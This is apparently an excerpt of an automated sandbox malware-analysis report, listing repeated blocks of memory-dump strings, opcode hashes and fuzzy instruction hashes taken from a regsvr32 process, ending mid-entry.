                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: dQ
                                                                                                                                            • API String ID: 0-4190919517
                                                                                                                                            • Opcode ID: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                                                                                                            • Instruction ID: 9d729ecabb7b74207a0fd84f221a36cedb2a9a3a0e5d95724699f54aa2ea8075
                                                                                                                                            • Opcode Fuzzy Hash: 97a4412cc2303f28c05fec1f0b2e1d428cb8767c43294622f9f6b74118afce77
                                                                                                                                            • Instruction Fuzzy Hash: 3E71E7711187988BDBFDCF28CC857D97BA6FB44744F20811CE84E8E261DB749A89CB02
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: )0
                                                                                                                                            • API String ID: 0-1029681778
                                                                                                                                            • Opcode ID: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                                                                                                            • Instruction ID: 121df312e681884aeaf9abe1505228ce9ff72d97cb51e4d07d955d8bff2ee376
                                                                                                                                            • Opcode Fuzzy Hash: 40e7eb8740bf53d50ac0b689975ccfd72f61ab29a6f5010a355cdccaad617979
                                                                                                                                            • Instruction Fuzzy Hash: 6851673861660CCBDB69DF78D4852E93BE0FF69344F20402DFC6687266DB34D52A8B58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Uerm
                                                                                                                                            • API String ID: 0-3179360214
                                                                                                                                            • Opcode ID: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                                                                                                            • Instruction ID: 041d59295089493447bb19a8378e04636211af5195b78f50b28b80e802418f55
                                                                                                                                            • Opcode Fuzzy Hash: 9ac54ab8c90a486f4441a78f79c66deafdf79af98abc137c17ed1b11debabc8b
                                                                                                                                            • Instruction Fuzzy Hash: AD6103B190061A8FCF48DFA8C48A5EEBBB1FB58344F10822DE815AB365C7749A55CFD4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: n?,#
                                                                                                                                            • API String ID: 0-1323099997
                                                                                                                                            • Opcode ID: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                                                                                                            • Instruction ID: 565b854ac311e8ede55e0f860d8d3b50ebc6ea35409b62ec986654d35b43713b
                                                                                                                                            • Opcode Fuzzy Hash: 26b976f19a01f89e53d4e797cc3bc9c5337180b5ac8f28c70c7e0350769e597c
                                                                                                                                            • Instruction Fuzzy Hash: 4461F97054878DCBEBBADE38C8897D937B0FB48344F908529E94E8E290DB749A458B45
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: NRx
                                                                                                                                            • API String ID: 0-1393999616
                                                                                                                                            • Opcode ID: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                                                                                                            • Instruction ID: 7c3eed2061eb3ea8b6bf0d1c70d9a16e0a2e2a77544f255897bb26607a47427d
                                                                                                                                            • Opcode Fuzzy Hash: b4a4ba5d31bb0dbda5b37bf156645da5abce175ef766aa9e7dc128ab78272a52
                                                                                                                                            • Instruction Fuzzy Hash: 46416C706197489BD3E5DF28C08679FBAE0FB88745F90A92DF585C32A1CB74C9488B43
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: hT
                                                                                                                                            • API String ID: 0-434349927
                                                                                                                                            • Opcode ID: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                                                                                                            • Instruction ID: 79a86a43dda6c0bf54cad5f70c675ce2074b99fb8c760d3b3e2f6daa19ea02a9
                                                                                                                                            • Opcode Fuzzy Hash: 6dc475388242e87dfd02804309664708b9ba0169bf98e34e56dbb37a95c1b731
                                                                                                                                            • Instruction Fuzzy Hash: 2A5190B190038E8BCB48DF68C88A5DE7BB0FB58308F104A19FC65A6250D7B4D669CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: w.
                                                                                                                                            • API String ID: 0-4252102657
                                                                                                                                            • Opcode ID: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                                                                                                            • Instruction ID: ff83c9861e3aef96e788ade2e95c5d31a765335f039db5447ff320373d52f62b
                                                                                                                                            • Opcode Fuzzy Hash: 775cc355a8dd2b6f1bc8d8548c4489e17c5a54c9aeae587b6d573d3d7a9b0f7e
                                                                                                                                            • Instruction Fuzzy Hash: 524127B190434A8BCF48DF64C88A4DE7FB1FB58348F10861DEC5AA7250D7749659CBC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: \>
                                                                                                                                            • API String ID: 0-4115654482
                                                                                                                                            • Opcode ID: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                                                                                                            • Instruction ID: c8bfe62f06df19f0db5cc8e5fd5c20be0a97c60a2c34a345c5b0509f61aa275d
                                                                                                                                            • Opcode Fuzzy Hash: ec85be460c7c8dfb7cf3a46c57a1e14dcdd929cba8cf803056f6d038e5aaf727
                                                                                                                                            • Instruction Fuzzy Hash: 5041B0B490038E8FDB48DF65D8895DE7BB0FB48358F104A1AEC25A6250D7B4D664CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: UfMm
                                                                                                                                            • API String ID: 0-3877223347
                                                                                                                                            • Opcode ID: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                                                                                                            • Instruction ID: c77ef5b6f515275834e01b5fcfcfc22ffe1a93dbca634ff8363d49e0f941db2a
                                                                                                                                            • Opcode Fuzzy Hash: dec106b4a764423c6080cde6e3c380fc2c4206b9dd3c84e9483206ca750e3b76
                                                                                                                                            • Instruction Fuzzy Hash: A1519EB190474E8BCF49CF64C48A5DE7FB0FB68398F214219E85A96250D3B8D6A4CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ^I%
                                                                                                                                            • API String ID: 0-4091345571
                                                                                                                                            • Opcode ID: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                                                                                                            • Instruction ID: 24279a7f0b8a810ed47d94a020ccddcda864278dcc3d62ea9a1aafd37f1cc870
                                                                                                                                            • Opcode Fuzzy Hash: 3f12ff418f07ff0dffb22bdd7eb3939b0fd24fdb2c19c7287af7d17ae91e7243
                                                                                                                                            • Instruction Fuzzy Hash: D641C2B090074E8BCB48DF68C58A4DE7FF0FB68398F204219EC16A6250D3B496A4CFD4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: E
                                                                                                                                            • API String ID: 0-4189953480
                                                                                                                                            • Opcode ID: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                                                                                                            • Instruction ID: 97bb68eb89739962e45bd832e2874dcd633b22f5609a7b84b761109d701c7c23
                                                                                                                                            • Opcode Fuzzy Hash: 6b2582ab6db5c886dc2d719d00820c997d2b994a7b2935478f04cfa12a5363ce
                                                                                                                                            • Instruction Fuzzy Hash: B341D5B491038E8FCF88DF69D8495DE7BB0FB18358F104A19EC2AA6250D3B49664CF85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: JLq
                                                                                                                                            • API String ID: 0-4186083495
                                                                                                                                            • Opcode ID: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                                                                                                            • Instruction ID: 27128c2ca0a5d288d3179379bf0eddb2aee49c7a11679c2610c242e98f2fdc84
                                                                                                                                            • Opcode Fuzzy Hash: 8d9a50e123908ca919991315c6f3e14c53aa3b8bc44063858183d3498e4e8681
                                                                                                                                            • Instruction Fuzzy Hash: 3C41D5B090064E8FDF48CF68C4865EE7BF1FB58358F114229E846AA254C7789A95CFD4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: vYa-
                                                                                                                                            • API String ID: 0-893662192
                                                                                                                                            • Opcode ID: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                                                                                                            • Instruction ID: ed719b7027dd4d7706803f37edca27847d3dc95415a6febebb675a1e15796353
                                                                                                                                            • Opcode Fuzzy Hash: 035fd408088c0482a5a9e27521314a342b14366a032dbf1fe9b8c33d69753ec7
                                                                                                                                            • Instruction Fuzzy Hash: 0741C0B090034E8FCF48CF64D88A5DE7FB0FB68398F104619E856A6250D7B896A5CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: < dA
                                                                                                                                            • API String ID: 0-2747138368
                                                                                                                                            • Opcode ID: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                                                                                                            • Instruction ID: 677e9d37894352eedc94dfbe70e1d5a5f16f85bbcaa69aa355918790c22682b0
                                                                                                                                            • Opcode Fuzzy Hash: 207b38533736b510735db2aca9d27c508cf70737fe24697ea278d93009114e66
                                                                                                                                            • Instruction Fuzzy Hash: 2741A0B180074E8FCB49CF64D48A4DE7FB0FB68388F204619E856A6254D7B496A8CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: w.
                                                                                                                                            • API String ID: 0-4252102657
                                                                                                                                            • Opcode ID: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                                                                                                            • Instruction ID: 9835b62cc5c81bb08ffa4c0ed138b56601e81b85f9b16a4ced47218125f66503
                                                                                                                                            • Opcode Fuzzy Hash: 8dc8ab0dff87e9b75af9bc87b01f2b240cfc8c73fd94611f7c31912defe47775
                                                                                                                                            • Instruction Fuzzy Hash: FC41E4B090434A8BCF48DF64C88A4DE7FB1FB58348F11861DEC5AA6250D7B496A9CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: }]T*
                                                                                                                                            • API String ID: 0-3642313528
                                                                                                                                            • Opcode ID: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                                                                                                            • Instruction ID: a9b4d124700f7192ec0ffbe58db6f2cedd89af67995077d1789eaf9c0a4fefb8
                                                                                                                                            • Opcode Fuzzy Hash: 7849323620c58637c1544052bb138ebef222585afcb74db7dd86457f284b6379
                                                                                                                                            • Instruction Fuzzy Hash: 624191B191074E9FCF48DF64D48A4DE7FB0FB68388F214619E816A6210D3B496A4CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: w.
                                                                                                                                            • API String ID: 0-4252102657
                                                                                                                                            • Opcode ID: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                                                                                                            • Instruction ID: 13a44cd4838b071505596f301d9460f32b91f3f909068c68e30d7ec81fe075ae
                                                                                                                                            • Opcode Fuzzy Hash: da61243a15702063775777e79984a8309a15a56a41d8ca6f71a856d03373fb1d
                                                                                                                                            • Instruction Fuzzy Hash: 194104B090434A8BCF48CF64C88A4DE7FB1FB58348F10861DEC5AA6250D7B496A8CFC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: N8$
                                                                                                                                            • API String ID: 0-2933465586
                                                                                                                                            • Opcode ID: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                                                                                                            • Instruction ID: 297b3d980fd839d27da657b87e2df8633a1b9c783a0b67fb1012bddc2283f9fe
                                                                                                                                            • Opcode Fuzzy Hash: 0eb94b4c30cdf64432c8dd49aa40656dc32a215d341cf791ffb885c3adf2427e
                                                                                                                                            • Instruction Fuzzy Hash: 0241827180078E8FCB45CF64D88A4CE7FB0FB18358F105A19F865A7260D3B49664CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: wk
                                                                                                                                            • API String ID: 0-1447520534
                                                                                                                                            • Opcode ID: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                                                                                                            • Instruction ID: ed1e7f9bc21f483ed76e74f249cc539d96e15df8e9c5d2752f3a18cd8a4680c8
                                                                                                                                            • Opcode Fuzzy Hash: 0a0edc96079985f20ed57ef59bebf533c7b67d56244039d22a088e51808c84b4
                                                                                                                                            • Instruction Fuzzy Hash: A041C4B180074E8BCB48DF68D48A4CE7FF0FB68398F10461DE859A6250D7B49AA4CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: D7
                                                                                                                                            • API String ID: 0-599489778
                                                                                                                                            • Opcode ID: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                                                                                                            • Instruction ID: 9ff7da26f915c3fd9b9081bc776a27ba1207aebd425a4d5bef8b93ab939ca450
                                                                                                                                            • Opcode Fuzzy Hash: 0decf5b59288eb500aae667ac6c9b4e4dce6b838f673c5fc17c927a6ca0452b7
                                                                                                                                            • Instruction Fuzzy Hash: 4541B0B090074E8BCF48DF68D4965DE7FB0FB68388F20421DE816A6250D7B496A5CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: -
                                                                                                                                            • API String ID: 0-2547686586
                                                                                                                                            • Opcode ID: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                                                                                                            • Instruction ID: fb4667ec304b728e9739446c3b2210f9efd75ae712771165d94948b9d3b69a1a
                                                                                                                                            • Opcode Fuzzy Hash: 39f87b108b025f322a4fb09bf0250602f0777b0869fb0748bb25e5d88246fb72
                                                                                                                                            • Instruction Fuzzy Hash: E641D2B181038ECFCB48CFA4D88A5CE7BB1FB48358F115A09FC65A6224D3B49665CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Q
                                                                                                                                            • API String ID: 0-2885194100
                                                                                                                                            • Opcode ID: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                                                                                                            • Instruction ID: a9705b719f6d6278401c973a571993bf085652b79919a3d293b183e1acac7421
                                                                                                                                            • Opcode Fuzzy Hash: bdb98b8b2c0f07edeaa2617f1c602c347d51b8d3ebd884f46db44bb476cabbd3
                                                                                                                                            • Instruction Fuzzy Hash: 9141F5B180434E8FCF48CFA4C84A4DE7FB1FB18318F004619EC5AA6250D7B49664CF85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: UA;k
                                                                                                                                            • API String ID: 0-1243451539
                                                                                                                                            • Opcode ID: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                                                                                                            • Instruction ID: 446a4ee04f98266578c7fdeec7750357e9914a8a062f983f2ae732e753f3f9f0
                                                                                                                                            • Opcode Fuzzy Hash: 9dbe3c72688dc078ed354c07d057a6794037f82480b8e2a0bdd9448b7935877c
                                                                                                                                            • Instruction Fuzzy Hash: AC31E2B090034E8FCB48DF65C48A4DE7FB0FB68398F104619E859A6250D3B896A5CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: BHj
                                                                                                                                            • API String ID: 0-429444599
                                                                                                                                            • Opcode ID: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                                                                                                            • Instruction ID: 88d82d5a62f7e83910e755dc00f06a4804c179e3d48da98a41081325a3075538
                                                                                                                                            • Opcode Fuzzy Hash: b2d81b77ec5a3d92ed60f1e2a925d42953c8b0d81e9e004bfe4218ede8c6c85b
                                                                                                                                            • Instruction Fuzzy Hash: 2F31B2B190078E8FCF84DF64C88A5DE7BB0FB58358F010A09E869A6250D7B8D665CF85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: h
                                                                                                                                            • API String ID: 0-130632579
                                                                                                                                            • Opcode ID: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                                                                                                            • Instruction ID: cf3c4ac770fe2f70a1efbbc55b0bf253fcb3f834dda7a796d3e0b8f6df5914ba
                                                                                                                                            • Opcode Fuzzy Hash: d5fc1072884fae1f5b57c471a7f51524b23a4deaf3d031234e0c0be062cfd6f2
                                                                                                                                            • Instruction Fuzzy Hash: 803102705187C48BD789CFA8C48965EFBE1FB94384F50492DF486867A0C7F8D948CB86
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ?%4
                                                                                                                                            • API String ID: 0-422666221
                                                                                                                                            • Opcode ID: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                                                                                                            • Instruction ID: a7a624d76b7a6b6a49308da5d267df16e75217d08dbc55e4173753466c7a619f
                                                                                                                                            • Opcode Fuzzy Hash: 9a50b58e01a5729271d6177eeb6adb68723f1c473c55e35b3503dad5704e2603
                                                                                                                                            • Instruction Fuzzy Hash: 0721A470628780AB878CDF28D49981BBBE1FBC9304F906A1CF9C68B364D7749445CB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ve
                                                                                                                                            • API String ID: 0-2619166483
                                                                                                                                            • Opcode ID: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
                                                                                                                                            • Instruction ID: bd1518f744f48cc188204749d08526443734dde3f23549b257c943e1dafbc1e4
                                                                                                                                            • Opcode Fuzzy Hash: 0af36e16279e0b52c57c96dd2be3cf2d778334959a734097dc29c8b03be7ea9c
